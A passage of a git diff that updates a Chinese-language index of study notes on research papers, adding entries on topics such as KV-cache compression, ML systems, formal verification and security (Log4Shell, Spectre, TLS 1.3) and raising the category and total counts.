把两张图按比例叠成一张,标签也一起叠](/study/papers/mixup-2018/) | ✅ v3 | | | [MMLU — 用 57 个学科的多选题考一考语言模型](/study/papers/mmlu-2021/) | ✅ v3 | | | [Mode Connectivity — 神经网络的两个最优解之间有低洼走廊](/study/papers/mode-connectivity-2018/) | ✅ v3 | | | [mPLUG-Owl — 模块化拼装多模态大模型](/study/papers/mplug-owl-2023/) | ✅ v3 | | | [N-BEATS — 纯前馈网络在时序预测上打败统计派](/study/papers/nbeats-2020/) | ✅ v3 | | +| [NestedKV — 嵌套内存路由实现长上下文 KV Cache 压缩](/study/papers/nestedkv/) | ✅ v3 | | | [NTK — 把无限宽的神经网络变成一个可解的核方法](/study/papers/ntk-2018/) | ✅ v3 | | | [NVILA — 先放大分辨率再压缩 token 的高效 VLM](/study/papers/nvila-2024/) | ✅ v3 | | | [Orca — 让一批 LLM 请求随到随走,不再排队等最长那个](/study/papers/orca-continuous-batching/) | ✅ v3 | | +| [OSCAR — 面向 2-bit KV Cache 的离线谱协方差感知旋转](/study/papers/oscar-int2-kv/) | ✅ v3 | | | [Parti — 把文生图当作翻译,用自回归 Transformer 一像素接一像素地写](/study/papers/parti-2022/) | ✅ v3 | | | [Performer — 用随机特征把 softmax attention 拉成线性复杂度](/study/papers/performer-2020/) | ✅ v3 | | +| [ProjectionBench — 渐进披露下,LLM 能「猜对」科学结论吗?](/study/papers/projection-bench/) | ✅ v3 | | | [Prototypical Networks — 每类算个均值,比距离就够了](/study/papers/prototypical-networks-2017/) | ✅ v3 | | +| [Qwen-VLA — 跨任务、环境与具身的统一视觉-语言-动作建模](/study/papers/qwen-vla/) | ✅ v3 | | | [Reformer — 用哈希分桶把 attention 从 O(L²) 压到 O(L log L)](/study/papers/reformer-2020/) | ✅ v3 | | | [REPLUG — 不动 LLM 一根毛,只把检索器调到它的"口味"上](/study/papers/replug-2023/) | ✅ v3 | | +| [Resolution Diagnostics for Paired LLM Evaluation — 排行榜上的 0.8 分差距能信吗?](/study/papers/resolution-diagnostics-llm/) | ✅ v3 | | +| [Reasoning in Memory — 解锁 LLM 的工作记忆做隐式推理](/study/papers/rim-latent-reasoning/) | ✅ v3 | | | [RoBERTa — 把 BERT 重训一遍就能拿 SOTA](/study/papers/roberta-2019/) | ✅ v3 | | | [RWKV — 让 RNN 拿到 Transformer 那张训练并行的入场券](/study/papers/rwkv-2023/) | ✅ v3 | | | [Soft Actor-Critic — 让强化学习既会拿分又愿意多试](/study/papers/sac-2018/) | ✅ v3 | | @@ -530,7 +572,9 @@ sidebar: | [Self-Refine — 让同一个模型自己改自己写的东西](/study/papers/self-refine-2023/) | ✅ v3 | | | [Seq2Seq — 把翻译变成端到端神经网络](/study/papers/seq2seq-2014/) | ✅ v3 | | | [Sophia — 让二阶优化器第一次在 LLM 预训练里跑得动](/study/papers/sophia-2023/) | ✅ v3 | | +| [SoundnessBench — AI 科学家能分清好想法与烂想法吗?](/study/papers/soundness-bench/) | ✅ v3 | | | [StarCoder — 把训练数据完整公开的 15B 代码模型](/study/papers/starcoder-2023/) | ✅ v3 | | +| [STORM — 面向多智能体协作的状态导向管理](/study/papers/storm-multi-agent-state/) | ✅ v3 | | | [StyleGAN2 — 把 StyleGAN 的水滴瑕疵和潜空间纠葛一起修掉](/study/papers/stylegan2-2020/) | ✅ v3 | | | [Sycophancy 2023 — RLHF 模型为什么爱顺着用户说](/study/papers/sycophancy-2023/) | ✅ v3 | | | [T0 — 让 50 个人各写各的提示词,模型反而更会听新指令](/study/papers/t0-2021/) | ✅ v3 | | @@ -538,7 +582,12 @@ sidebar: | [TD3 — 给 DDPG 装两副刹车,连续控制终于稳了](/study/papers/td3-2018/) | ✅ v3 | | | [Transformer-XL — 让 Transformer 像 RNN 那样把上下文滚动传下去](/study/papers/transformer-xl-2019/) | ✅ v3 | | | [Tree of Thoughts — 让 LLM 像下棋一样多想几步再答](/study/papers/tree-of-thoughts-2023/) | ✅ v3 | | +| [TriAxialKV — Agent 推理场景下的极低精度 KV Cache 混合量化](/study/papers/triaxialkv/) | ✅ v3 | | +| [Tutti — 让 SSD 上的 KV Cache 真正可用于长上下文 LLM 推理](/study/papers/tutti-ssd-kv-cache/) | ✅ v3 | | | [VALL-E — 3 秒样本零样本语音克隆](/study/papers/vall-e-2023/) | ✅ v3 | | +| [VeriCache — 把有损 KV Cache 变成无损 LLM 推理](/study/papers/vericache/) | ✅ v3 | | +| [VibeServe — 零基础学习笔记](/study/papers/vibeserve/) | ✅ v3 | | +| [VisualThink-VLA — 用「视觉中间推理」做低延迟的机器人策略](/study/papers/visualthink-vla/) | ✅ v3 | | | [Whisper — 68 万小时弱监督训出的语音识别](/study/papers/whisper-2022/) | ✅ v3 | | | [XLNet — 把句子打乱顺序读,借此同时拿到 AR 和双向](/study/papers/xlnet-2019/) | ✅ v3 | | @@ -669,6 +718,25 @@ sidebar: | [Sparse Autoencoders — 把 superposition 解出来](/study/papers/sparse-autoencoders/) | 🗄 存量 | | | [Toy Models of Superposition](/study/papers/toy-models-superposition/) | ✅ v3 | | +### ML 系统 + +| 论文 | 质量 | 描述 | +|---|:---:|---| +| [ZeRO++ — 巨型模型训练中的极致高效集合通信](/study/papers/ds-zero-pp-comm/) | ✅ v3 | | +| [ExpertFlow — MoE 预测式专家缓存与 Token 调度(零基础学习笔记)](/study/papers/expertflow-moe-offload/) | ✅ v3 | | +| [FlashAttention-2 — 更快的 Attention 与更好的并行](/study/papers/flashattention-2/) | ✅ v3 | | +| [FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度](/study/papers/flashattention-3-2024/) | ✅ v3 | | +| [Liger Kernel — 面向 LLM 训练的高效 Triton Kernel 套件](/study/papers/liger-kernel-llm-training/) | ✅ v3 | | +| [Megatron Core MoE 大规模训练 — 零基础学习笔记](/study/papers/megatron-core-moe-2026/) | ✅ v3 | | +| [Nexus — 单 GPU 内主动式 Prefill/Decode 分离](/study/papers/nexus-prefill-decode-intra-gpu/) | ✅ v3 | | +| [PagedAttention 与 vLLM — 零基础学习笔记](/study/papers/paged-attention-vllm/) | ✅ v3 | | +| [QServe — W4A8KV4 量化与系统协同设计(零基础学习笔记)](/study/papers/qserve-w4a8kv4-2024/) | ✅ v3 | | +| [SGLang — 结构化语言模型程序的高效执行(RadixAttention 零基础笔记)](/study/papers/sglang-radixattention/) | ✅ v3 | | +| [Speculative Decoding — 用小模型「猜」、大模型「验」,无损加速 Transformer 推理](/study/papers/speculative-decoding-leviathan-2023/) | ✅ v3 | | +| [TensorRT-LLM — NVIDIA 开源 LLM 推理优化库零基础笔记](/study/papers/tensorrt-llm-overview/) | ✅ v3 | | +| [The Anatomy of a Triton Attention Kernel — 零基础学习笔记](/study/papers/triton-anatomy-paged-attn/) | ✅ v3 | | +| [veScale-FSDP — 灵活且高性能的大规模 FSDP](/study/papers/vescale-fsdp-2026/) | ✅ v3 | | + ### 其他子类 | 论文 | 质量 | 描述 | @@ -706,7 +774,7 @@ sidebar: ## 后端 API -共 9 篇。 +共 10 篇。 ### 后端 @@ -722,6 +790,7 @@ sidebar: | 论文 | 质量 | 描述 | |---|:---:|---| | [Islands Architecture — 静态页面里只让需要交互的小块加载 JS](/study/papers/islands-architecture/) | ✅ v3 | | +| [MCP Is Dead? — 2026 年协议存废之争零基础笔记](/study/papers/mcp-is-dead-debate/) | ✅ v3 | | | [nvm — 在同一台机器上轻松切换 Node 版本](/study/papers/nvm/) | ✅ v3 | | | [React Server Components — 让组件自己决定在哪台机器跑](/study/papers/react-server-components/) | ✅ v3 | | | [Server-Sent Events — 服务器单向推送的标准协议](/study/papers/server-sent-events/) | ✅ v3 | | @@ -981,13 +1050,14 @@ sidebar: ## 形式化方法 -共 51 篇。 +共 54 篇。 ### 形式化验证 | 论文 | 质量 | 描述 | |---|:---:|---| | [ACL2 — 用纯 Lisp 当数学对象,机器证明工业级硬件正确](/study/papers/acl2-2000/) | ✅ v3 | | +| [First Steps Towards Probabilistic Iris (Amaryllis)](/study/papers/amaryllis-probabilistic-iris/) | ✅ v3 | | | [Apron — 把区间/八边形/多面体塞进同一个插槽](/study/papers/apron-2009/) | ✅ v3 | | | [Awodey-Warren — 把『相等的证明』看成两点之间的路径](/study/papers/awodey-warren-2009/) | ✅ v3 | | | [Bounded Model Checking — 把硬件验证翻译成一道 SAT 题](/study/papers/biere-bmc-1999/) | ✅ v3 | | @@ -1027,6 +1097,7 @@ sidebar: | [Nuprl — 第一个把 Martin-Löf 类型论搬上屏幕的证明助手](/study/papers/nuprl-1986/) | ✅ v3 | | | [Pnueli 时序逻辑 — 给"永远不死锁""请求最终被响应"找一套数学语言](/study/papers/pnueli-temporal-1977/) | ✅ v3 | | | [ProVerif — 把密码协议翻成 Prolog 规则让计算机自己证安全](/study/papers/proverif-2001/) | ✅ v3 | | +| [Spec-Agent — 用 Agent + 分离逻辑 + Fuzz 自动写 C++ 合约](/study/papers/spec-agent-separation-logic/) | ✅ v3 | | | [Stainless — 让编译器替你证明 Scala 函数真的满足规约](/study/papers/stainless-2017/) | ✅ v3 | | | [Tamarin — 让计算机自己证 Signal、TLS 1.3 这种带 DH 的协议是不是真安全](/study/papers/tamarin-2012/) | ✅ v3 | | | [TLC — 让 TLA+ 规范可以一键机检的模型检查器](/study/papers/tla-yu-tlc-1999/) | ✅ v3 | | @@ -1042,6 +1113,7 @@ sidebar: | 论文 | 质量 | 描述 | |---|:---:|---| +| [COMPOSE — 从引用与形式结构「合成」未来定理](/study/papers/compose-future-theorems/) | ✅ v3 | | | [Gödel 1931 — 不完备性定理](/study/papers/godel-1931/) | ✅ v3 | | ## 通信 @@ -1153,7 +1225,16 @@ sidebar: ## CLI -共 1 篇。 +共 5 篇。 + +### 编辑器与 IDE + +| 论文 | 质量 | 描述 | +|---|:---:|---| +| [Debug Adapter Protocol — 让编辑器共享同一套「调试遥控器」的通用协议](/study/papers/debug-adapter-protocol/) | ✅ v3 | | +| [Language Server Protocol — 让编辑器共享同一套「语言大脑」的 USB 协议](/study/papers/language-server-protocol-spec/) | ✅ v3 | | +| [On Rendering Diffs — 浏览器里渲染代码 diff 为何比看起来难得多](/study/papers/rendering-diffs/) | ✅ v3 | | +| [Tree-sitter — 增量式解析系统](/study/papers/tree-sitter-2018/) | ✅ v3 | | ### 其他子类 @@ -1211,7 +1292,7 @@ sidebar: ## 安全与隐私 -共 54 篇。 +共 68 篇。 ### 安全与隐私 @@ -1231,6 +1312,7 @@ sidebar: | [KLEE — 符号执行自动生成高覆盖测试](/study/papers/cadar-klee-2008/) | ✅ v3 | | | [Homomorphic Encryption for Arithmetic of Approximate Numbers](/study/papers/cheon-ckks-2017/) | ✅ v3 | | | [Faster Fully Homomorphic Encryption: Bootstrapping in Less Than 0.1 Seconds](/study/papers/chillotti-tfhe-2016/) | ✅ v3 | | +| [CKKS 同态加密 — 在加密数据上做近似浮点运算](/study/papers/ckks-homomorphic-2017/) | ✅ v3 | | | [Intel SGX 详解 — 在不可信云里圈一块硬件保险箱](/study/papers/costan-sgx-explained-2016/) | ✅ v3 | | | [Flash Boys 2.0 — 区块链上的抢跑者和共识危机](/study/papers/daian-flash-boys-2020/) | ✅ v3 | | | [Sphinx — mix 网络最紧凑的可证安全消息格式](/study/papers/danezis-sphinx-2009/) | ✅ v3 | | @@ -1238,6 +1320,7 @@ sidebar: | [CRYSTALS-Dilithium — 量子计算机来了也签不掉的数字签名](/study/papers/ducas-dilithium-2018/) | ✅ v3 | | | [Local Privacy and Statistical Minimax Rates](/study/papers/duchi-local-dp-2013/) | ✅ v3 | | | [校准噪声与敏感度 — Laplace 机制奠基](/study/papers/dwork-calibrating-noise-2006/) | ✅ v3 | | +| [校准噪声与敏感度 — 差分隐私的 Laplace 机制](/study/papers/dwork-differential-privacy-2006/) | ✅ v3 | | | [差分隐私 — ε 与邻接数据集不可区分](/study/papers/dwork-dp-icalp-2006/) | ✅ v3 | | | [分布式噪声生成 — 去掉可信管理员也能保护隐私](/study/papers/dwork-our-data-ourselves-2006/) | ✅ v3 | | | [RAPPOR — 本地差分隐私随机响应采集](/study/papers/erlingsson-rappor-2014/) | ✅ v3 | | @@ -1253,20 +1336,32 @@ sidebar: | [Keystone — 开源可定制 RISC-V TEE 框架](/study/papers/lee-keystone-2020/) | ✅ v3 | | | [t-Closeness — 用"分布距离"堵住匿名化的最后漏洞](/study/papers/li-t-closeness-2007/) | ✅ v3 | | | [Meltdown — 乱序执行偷读内核内存](/study/papers/lipp-meltdown-2018/) | ✅ v3 | | +| [Log4Shell (CVE-2021-44228) — 一条日志字符串如何远程控制服务器](/study/papers/log4shell-cve-2021-44228/) | ✅ v3 | | | [l-多样性 — k-匿名之后的隐私保护](/study/papers/machanavajjhala-l-diversity-2007/) | ✅ v3 | | | [Madry PGD 2017 — 用最强对手训练最强防御](/study/papers/madry-pgd-2017/) | ✅ v3 | | | [FedAvg — 联邦学习奠基算法](/study/papers/mcmahan-fedavg-2017/) | ✅ v3 | | +| [Meltdown — 从用户空间偷读内核内存](/study/papers/meltdown-attack-2018/) | ✅ v3 | | | [Rényi 差分隐私 — 隐私会计统一框架](/study/papers/mironov-renyi-dp-2017/) | ✅ v3 | | | [Dynamic Taint Analysis for Automatic Detection, Analysis, and Signature Generation of Exploits on Commodity Software](/study/papers/newsome-taintcheck-2005/) | ✅ v3 | | | [TrustZone — ARM 给 CPU 装上"双重人格"隔离安全世界](/study/papers/ngabonziza-trustzone-2016/) | ✅ v3 | | +| [Noise Protocol Framework — 用「握手配方」拼出端到端加密通道](/study/papers/noise-protocol-framework/) | ✅ v3 | | +| [OAuth 2.0 Authorization Framework (RFC 6749) — 不用把密码交给第三方,也能授权访问](/study/papers/oauth2-rfc6749/) | ✅ v3 | | | [Loopix — 低延迟 mix 网络实现发送方和接收方双向匿名](/study/papers/piotrowska-loopix-2017/) | ✅ v3 | | | [Rabin 遗忘传输 — 发送方永远不知道你收到了什么](/study/papers/rabin-ot-1981/) | ✅ v3 | | | [洋葱路由 1998 — 把匿名通信从理论搬进真实互联网](/study/papers/reed-onion-routing-1998/) | ✅ v3 | | | [On Lattices, Learning with Errors, Random Linear Codes, and Cryptography](/study/papers/regev-lwe-2005/) | ✅ v3 | | +| [Row Hammer — 不碰邻居也能把邻居的位翻过来](/study/papers/rowhammer-2014/) | ✅ v3 | | +| [RSA 1978 — 数字签名与公钥密码的奠基论文](/study/papers/rsa-1978/) | ✅ v3 | | | [MIA 成员推断攻击 — 黑盒 API 能猜出你是不是训练数据](/study/papers/shokri-mia-2017/) | ✅ v3 | | +| [Double Ratchet Algorithm — Signal 端到端加密会话的「双棘轮」](/study/papers/signal-double-ratchet-2016/) | ✅ v3 | | +| [Sigstore — 让每个人都能给软件「盖公证章」](/study/papers/sigstore-cosign-2022/) | ✅ v3 | | +| [Spectre Attacks — 推测执行如何绕过边界检查偷读内存](/study/papers/spectre-attack-2018/) | ✅ v3 | | | [k-匿名 — 发布数据时让攻击者无法锁定你是谁](/study/papers/sweeney-k-anonymity-2002/) | ✅ v3 | | | [Szegedy 对抗样本 2013 — 一张图片骗过神经网络的开山之作](/study/papers/szegedy-adversarial-2013/) | ✅ v3 | | +| [TLS 1.3 (RFC 8446) — 更快、更简、默认前向保密的 HTTPS 握手](/study/papers/tls-1-3-rfc8446/) | ✅ v3 | | +| [WebAuthn Level 2 — 用公钥凭证替代密码的 Web 标准](/study/papers/webauthn-fido2/) | ✅ v3 | | | [Yao 混淆电路 — 让两人合算函数却互不泄密](/study/papers/yao-garbled-circuits-1986/) | ✅ v3 | | +| [Pinocchio 2013 — 首个「近乎实用」的可验证计算与 zk-SNARK 工程系统](/study/papers/zk-snark-pinocchio-2013/) | ✅ v3 | | ### 密码学 @@ -1306,7 +1401,7 @@ sidebar: --- -## 全部 948 篇(字母序) +## 全部 1033 篇(字母序) | Slug | 论文 | 质量 | 一级 | 子分类 | |---|---|:---:|---|---| @@ -1331,6 +1426,7 @@ sidebar: | `align-2021` | [ALIGN — 用 18 亿条脏图文对训练,证明数据规模能压住噪声](/study/papers/align-2021/) | ✅ v3 | 机器学习 | 模型与训练 | | `alpa-2022` | [Alpa — 把张量/流水/数据并行统一成一道搜索题](/study/papers/alpa-2022/) | ✅ v3 | 图形学 | GPU 架构 | | `alphago` | [AlphaGo — 击败围棋世界冠军](/study/papers/alphago/) | ✅ v3 | 机器学习 | 强化学习 / AI | +| `amaryllis-probabilistic-iris` | [First Steps Towards Probabilistic Iris (Amaryllis)](/study/papers/amaryllis-probabilistic-iris/) | ✅ v3 | 形式化方法 | 形式化验证 | | `amdahl-law-1967` | [Amdahl 定律 — 串行比例决定并行加速比的上界](/study/papers/amdahl-law-1967/) | ✅ v3 | 图形学 | GPU 架构 | | `amoeba-1990` | [Amoeba — 把整个机房当一台操作系统](/study/papers/amoeba-1990/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `ampere-architecture-2020` | [NVIDIA Ampere — 第三代 Tensor Core 加 TF32 / BF16 / FP64,结构化稀疏 + MIG 重写大模型时代硬件假设](/study/papers/ampere-architecture-2020/) | ✅ v3 | 图形学 | GPU 架构 | @@ -1385,6 +1481,7 @@ sidebar: | `bigbench-2022` | [BIG-bench — 204 道题给大模型出考卷](/study/papers/bigbench-2022/) | ✅ v3 | 机器学习 | 模型与训练 | | `biggan-2018` | [BigGAN — 把 GAN 暴力放大到 ImageNet 512×512](/study/papers/biggan-2018/) | ✅ v3 | 机器学习 | 模型与训练 | | `bigtable-2006` | [Bigtable 2006 — Google 把行级随机读写做到 PB 级的存储系统](/study/papers/bigtable-2006/) | 🗄 存量 | 数据库 | 存储与查询 | +| `bijou64-varint` | [Bijou64 — 结构式规范化的变长整数编码](/study/papers/bijou64-varint/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `bitcoin` | [Bitcoin 白皮书](/study/papers/bitcoin/) | ✅ v3 | 分布式系统 | 分布式系统 / 密码学 | | `bittorrent-2003` | [BitTorrent — 用"以牙还牙"逼大家都上传](/study/papers/bittorrent-2003/) | ✅ v3 | 网络协议 | 网络协议 | | `blackwell-architecture-2024` | [NVIDIA Blackwell — 双 die NV-HBI + 第二代 Transformer Engine + FP4 让万亿参数训练日常化](/study/papers/blackwell-architecture-2024/) | ✅ v3 | 图形学 | GPU 架构 | @@ -1411,6 +1508,7 @@ sidebar: | `bunz-bulletproofs-2018` | [Bulletproofs: Short Proofs for Confidential Transactions and More](/study/papers/bunz-bulletproofs-2018/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `burgess-2020-turing-rt` | [Burgess 2020 RTX ON — Turing 把光线追踪做进硅片](/study/papers/burgess-2020-turing-rt/) | ✅ v3 | 图形学 | 渲染与图形 | | `bvt-1999` | [BVT 1999 — 让一份调度器同时照顾"急性子"和"老黄牛"](/study/papers/bvt-1999/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `bw-tree` | [Bw-Tree — 面向新硬件的无锁 B 树索引](/study/papers/bw-tree/) | ✅ v3 | 数据库 | 存储与查询 | | `byzantine-generals-1982` | [拜占庭将军问题 — 节点能撒谎时怎么达成一致](/study/papers/byzantine-generals-1982/) | ✅ v3 | 分布式系统 | 共识与复制 | | `cadar-klee-2008` | [KLEE — 符号执行自动生成高覆盖测试](/study/papers/cadar-klee-2008/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `caesar-rexford-2005` | [Caesar-Rexford 2005 — 你的包为什么绕了大半个地球](/study/papers/caesar-rexford-2005/) | ✅ v3 | 网络协议 | 网络协议 | @@ -1427,6 +1525,8 @@ sidebar: | `catmull-1974-zbuffer` | [Catmull 1974 Z-buffer — 用一张深度图解决谁挡谁的问题](/study/papers/catmull-1974-zbuffer/) | ✅ v3 | 图形学 | 渲染与图形 | | `catmull-clark-1978` | [Catmull-Clark 1978 — 让任意拓扑网格收敛成光滑曲面](/study/papers/catmull-clark-1978/) | ✅ v3 | 图形学 | 渲染与图形 | | `causal-abstraction` | [Causal Abstraction — 神经网络与算法的因果对齐](/study/papers/causal-abstraction/) | ✅ v3 | 机器学习 | AI 可解释性 | +| `cci-agent-scaffolding` | [Cross-Component Interference in LLM Agent Scaffolding(LLM Agent 脚手架的跨组件干扰)](/study/papers/cci-agent-scaffolding/) | ✅ v3 | 机器学习 | 模型与训练 | +| `ccopd-distillation` | [CCOPD — 多轮语言模型的规范上下文在线策略蒸馏](/study/papers/ccopd-distillation/) | ✅ v3 | 机器学习 | 模型与训练 | | `cell-be-2005` | [Cell BE — 一颗 CPU 里塞 8 个加速核](/study/papers/cell-be-2005/) | ✅ v3 | 图形学 | GPU 架构 | | `ceph-2006` | [Ceph — 让分布式文件系统不靠中心查表](/study/papers/ceph-2006/) | ✅ v3 | 数据库 | 存储与查询 | | `cerf-kahn-1974` | [Cerf-Kahn 1974 — 用网关把异构网络拼成一个互联网](/study/papers/cerf-kahn-1974/) | ✅ v3 | 网络协议 | 网络协议 | @@ -1450,6 +1550,7 @@ sidebar: | `chubby` | [Chubby — 给凡人用的分布式锁服务](/study/papers/chubby/) | ✅ v3 | 分布式系统 | 分布式系统 | | `ci-effects` | [CI Effects — 持续集成不是免费午餐,价值看实现细节](/study/papers/ci-effects/) | ✅ v3 | 其他 | 软件工程 | | `cimatti-nusmv-2002` | [NuSMV 2 — 把 BDD 和 SAT 两种验证引擎装进同一个开源工具](/study/papers/cimatti-nusmv-2002/) | ✅ v3 | 形式化方法 | 形式化验证 | +| `ckks-homomorphic-2017` | [CKKS 同态加密 — 在加密数据上做近似浮点运算](/study/papers/ckks-homomorphic-2017/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `clark-1988` | [Clark 1988 — TCP/IP 七大目标的优先级,决定了 Internet 长成今天这样](/study/papers/clark-1988/) | ✅ v3 | 网络协议 | 网络协议 | | `clarke-cegar-2003` | [CEGAR — 用反例自动改进抽象,让大软件能被验证](/study/papers/clarke-cegar-2003/) | ✅ v3 | 形式化方法 | 形式化验证 | | `clarke-emerson-1981` | [Clarke-Emerson 1981 — 让机器自己检查并发程序对不对](/study/papers/clarke-emerson-1981/) | ✅ v3 | 形式化方法 | 形式化验证 | @@ -1473,9 +1574,13 @@ sidebar: | `cohen-1985-hemicube` | [Cohen-Greenberg 1985 Hemicube — 把渲染硬件挪去算辐射度积分](/study/papers/cohen-1985-hemicube/) | ✅ v3 | 图形学 | 渲染与图形 | | `colbert-2020` | [ColBERT — 让 BERT 检索既准又能扛大规模](/study/papers/colbert-2020/) | ✅ v3 | 信息检索 | 检索与排序 | | `colbert-v2` | [ColBERTv2 — 让向量检索既精又能扛百万文档](/study/papers/colbert-v2/) | ✅ v3 | 信息检索 | 数据检索 | +| `columnar-storage-formats-2023` | [列式存储格式实证评估 — Parquet 与 ORC 谁更适合 2020 年代?](/study/papers/columnar-storage-formats-2023/) | ✅ v3 | 数据库 | 存储与查询 | | `comer-1979-btree` | [Comer 1979 — B-Tree 综述:为什么这棵树到处都有](/study/papers/comer-1979-btree/) | ✅ v3 | 数据库 | 存储与查询 | | `compcert` | [CompCert — 每条优化都被数学证明保持语义的 C 编译器](/study/papers/compcert/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `compiler-errors` | [Compiler Error Messages — 让编译报错有用](/study/papers/compiler-errors/) | ✅ v3 | 编程语言 | 编程语言 / 编译器 | +| `compiler-perf-left-on-table` | [Performance Left on the Table — 编译器自动向量化还剩多少性能没吃到](/study/papers/compiler-perf-left-on-table/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `compose-future-theorems` | [COMPOSE — 从引用与形式结构「合成」未来定理](/study/papers/compose-future-theorems/) | ✅ v3 | 形式化方法 | 定理证明 | +| `compositional-incoherence` | [Locally Coherent, Globally Incoherent — 多组件 LLM Agent 的组合不一致性](/study/papers/compositional-incoherence/) | ✅ v3 | 机器学习 | 模型与训练 | | `consistency-models-2023` | [Consistency Models — 把 50 步扩散压成 1 步出图](/study/papers/consistency-models-2023/) | ✅ v3 | 机器学习 | 模型与训练 | | `consistent-hashing-1997` | [Consistent Hashing — 加机器只搬一小部分数据的哈希环](/study/papers/consistent-hashing-1997/) | ✅ v3 | 分布式系统 | 共识与复制 | | `constitutional-ai` | [Constitutional AI — Anthropic 的对齐方法](/study/papers/constitutional-ai/) | ✅ v3 | 机器学习 | AI 安全 / NLP | @@ -1499,6 +1604,7 @@ sidebar: | `crdt-shapiro-2011` | [CRDT — 让多副本各改各的,最终自动合一](/study/papers/crdt-shapiro-2011/) | ✅ v3 | 分布式系统 | 共识与复制 | | `crdt-sss-2011` | [CRDT 形式定义 — SSS 2011 八页浓缩版](/study/papers/crdt-sss-2011/) | ✅ v3 | 分布式系统 | 共识与复制 | | `croft-harper-1979` | [Croft-Harper 1979 — 没有相关性反馈也能跑概率检索](/study/papers/croft-harper-1979/) | ✅ v3 | 信息检索 | 检索与排序 | +| `crossover-context-multi-agent` | [When Context Hurts — 知识迁移在多智能体设计中的交叉效应](/study/papers/crossover-context-multi-agent/) | ✅ v3 | 机器学习 | 模型与训练 | | `cryptoverif-2008` | [CryptoVerif — 让计算机直接证密码协议在真实计算模型下安全](/study/papers/cryptoverif-2008/) | ✅ v3 | 形式化方法 | 形式化验证 | | `csp-hoare-1978` | [CSP — 进程之间只许喊话不许共用内存](/study/papers/csp-hoare-1978/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `cstore-2005` | [C-Store — 把数据按列存,分析查询直接快十倍](/study/papers/cstore-2005/) | ✅ v3 | 数据库 | 存储与查询 | @@ -1523,6 +1629,7 @@ sidebar: | `debate-2018` | [AI safety via debate — 让两个 AI 互辩,人类只当评委](/study/papers/debate-2018/) | ✅ v3 | 机器学习 | 模型与训练 | | `deberta-2021` | [DeBERTa — 把"内容"和"位置"拆成两路独立看的 BERT](/study/papers/deberta-2021/) | ✅ v3 | 机器学习 | 模型与训练 | | `debevec-1998-rendering-with-natural-light` | [Debevec 1998 — 用真实世界的光照亮 CG 物体](/study/papers/debevec-1998-rendering-with-natural-light/) | ✅ v3 | 图形学 | 渲染与图形 | +| `debug-adapter-protocol` | [Debug Adapter Protocol — 让编辑器共享同一套「调试遥控器」的通用协议](/study/papers/debug-adapter-protocol/) | ✅ v3 | CLI | 编辑器与 IDE | | `debugging-dichotomy` | [Debugging Dichotomy — 程序员真实 debug 行为分两轨](/study/papers/debugging-dichotomy/) | ✅ v3 | 其他 | 软件工程实证 | | `decision-transformer-2021` | [Decision Transformer — 把强化学习当成"文字接龙"](/study/papers/decision-transformer-2021/) | ✅ v3 | 机器学习 | 模型与训练 | | `deepseek-coder-2024` | [DeepSeek-Coder — 按整个仓库喂代码的开源 SOTA](/study/papers/deepseek-coder-2024/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -1530,6 +1637,7 @@ sidebar: | `deepspeed-zero` | [DeepSpeed ZeRO — 微软优化大模型训练显存](/study/papers/deepspeed-zero/) | ✅ v3 | 分布式系统 | 模型与训练 | | `deering-1988-triangle-processor` | [Deering 1988 Triangle Processor — 现代 GPU 的祖先架构](/study/papers/deering-1988-triangle-processor/) | ✅ v3 | 图形学 | 渲染与图形 | | `demikernel-2021` | [Demikernel — 微秒级数据中心的 datapath OS 架构](/study/papers/demikernel-2021/) | ✅ v3 | 操作系统 | 内核与虚拟化 | +| `demystifying-data-org` | [Demystifying Data Organization for Enhanced LLM Training — 用「排课表」而不是「删题目」提升大模型训练](/study/papers/demystifying-data-org/) | ✅ v3 | 机器学习 | 模型与训练 | | `denali-2002` | [Denali — 在一台机器上同时跑上千个轻量 VM 的早期实验](/study/papers/denali-2002/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `dense360-2025` | [Dense360 — 全景 ERP 密集理解与 ERP-RoPE](/study/papers/dense360-2025/) | ✅ v3 | 机器学习 | 视频理解 | | `desbrun-1999-implicit-fairing` | [Desbrun 1999 — 把热扩散方程隐式离散到三角网](/study/papers/desbrun-1999-implicit-fairing/) | ✅ v3 | 图形学 | 渲染与图形 | @@ -1561,9 +1669,11 @@ sidebar: | `dpr-2020` | [DPR — 用 BERT 双塔把检索从 BM25 时代拉进稠密向量时代](/study/papers/dpr-2020/) | ✅ v3 | 信息检索 | 检索与排序 | | `dqn` | [DQN — Deep Q-Network](/study/papers/dqn/) | ✅ v3 | 机器学习 | 强化学习 | | `dreamfusion-2022` | [DreamFusion — 用 2D 扩散模型当老师,把 NeRF 教成 3D](/study/papers/dreamfusion-2022/) | ✅ v3 | 机器学习 | 模型与训练 | +| `dremel-decade-2020` | [Dremel 十年回顾 — Web 规模交互式 SQL 分析如何演化为 BigQuery](/study/papers/dremel-decade-2020/) | ✅ v3 | 数据库 | 存储与查询 | | `drizzle-2017` | [Drizzle — 让 micro-batch 也能跑出 100ms 延迟](/study/papers/drizzle-2017/) | ✅ v3 | 分布式系统 | 共识与复制 | | `drmm-2016` | [DRMM — 检索里的匹配是相关性不是语义相似](/study/papers/drmm-2016/) | ✅ v3 | 信息检索 | 检索与排序 | | `dropout-2014` | [Dropout — 训练时随机关掉一半神经元,反而学得更好](/study/papers/dropout-2014/) | ✅ v3 | 机器学习 | 模型与训练 | +| `ds-zero-pp-comm` | [ZeRO++ — 巨型模型训练中的极致高效集合通信](/study/papers/ds-zero-pp-comm/) | ✅ v3 | 机器学习 | ML 系统 | | `dspy` | [DSPy — 把 prompt 写成签名,让编译器替你调](/study/papers/dspy/) | ✅ v3 | 编程语言 | 编程语言 | | `dssm-2013` | [DSSM — 把 query 和文档各编码成 128 维向量再算余弦](/study/papers/dssm-2013/) | ✅ v3 | 信息检索 | 检索与排序 | | `dstreams-2013` | [D-Streams — 把流处理伪装成一串很小的批](/study/papers/dstreams-2013/) | ✅ v3 | 数据库 | 存储与查询 | @@ -1571,6 +1681,7 @@ sidebar: | 